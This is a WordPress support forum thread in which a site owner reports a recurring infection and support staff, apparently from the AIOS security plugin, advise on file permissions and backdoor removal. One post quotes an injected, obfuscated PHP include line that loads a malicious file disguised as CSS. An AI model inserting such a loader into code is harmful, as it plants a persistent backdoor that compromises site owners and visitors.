hacker attack?

Hi @diebeti,

No AIOS do not add such code. Generally, wp-config.php permission should be 0640

But somehow if the hacker code is added in plugin or file upload as php file it allows to edit the wp-config.php as per permission ( generally many plugins / wordperss install writes to wp-config.php ) . you can change it to 0400 once you removed that hacked code in wp-config.php to it will not be writable.

It is an indication of hacker code. please take backup of it. check which files have recently been added if possible upgrade the WordPress files, Pluings / themes files and cross check in wp-content there is no any such php file.

Regards

Hello @hjogiupdraftplus, thank you for the answer ?? Is the following really from AIOS?

aios-bootstrap.php

<?php
/**

• @version 1.0.2
• WARNING: Please do not delete this file.
  • This will cause PHP to throw a fatal error and render your site unusable.
  • To safely delete this file, please check both your .user.ini file and your php.ini file and ensure this file is not set in the auto_prepend_file directive.
  • Please ask your web hosting provider if you need guidance with executing the aforementioned steps.
    */
    $GLOBALS[‘aiowps_firewall_rules_path’] = DIR.’/wp-content/uploads/aios/firewall-rules/’;

$GLOBALS[‘aiowps_firewall_data’] = array(
‘ABSPATH’ => ‘/var/www/web……/html/wordpress/’,
);

Greetings ??

Hi @diebeti

Yes aios-bootstrap.php is from AIOS plugin.

It is right now defining aiowps_firewall_rules_path and aiowps_firewall_data global variable and including firewall file

all-in-one-wp-security-and-firewall/classes/firewall/wp-security-firewall.php

if other code is inside that file then it is malware code.

Regards

Hello, thank you for your answer. ?? Now I keep having the problem that, despite the security plugin, there are probably “malicious” files on my blog. I then delete them again and again. Somewhere in a file, after a short time, a line is always added to an existing file, such as this:

“/*390d1*/ $rsc4no = “/var/www/web135014/htm\x6c/wordpress/wp\x2dinc\x6cudes/ b\x6cocks/media\x2dtext/.c93b5c62.css”; if (214 + 43){ @include_once /* sxwfl */ ($rsc4no); } /*390d1*/”

– then to a new one created file, which is usually disguised as a CSS file, but contains PHP lines. In addition, the write permissions from wp-config.php are automatically implemented each time. I had set them to 400 as you suggested and today they were back to 755. But I don’t see any changes in the wp-config.php. But my database password can be seen there. Is it possible that the password can also be read by others? I also reinstalled WordPress and renewed all the plugins.

Greetings ??

Hi @diebeti,

AIOS has a list of features which provides certain level security.

In your case somehow the PHP file execution code got uploaded might be due to a plugin or ftp account hack and it is beyond of AIOS.

It needs to indentify backdoor script which keeps writing the code and changing permission of wp-config.php file. Also the reason how tha backdoor script uploaded there.

You need to get help of the developer or malware removal service provider for WordPress.

In wp-config.php DB password required to access by the WordPress Code file for Data Operation.

Regards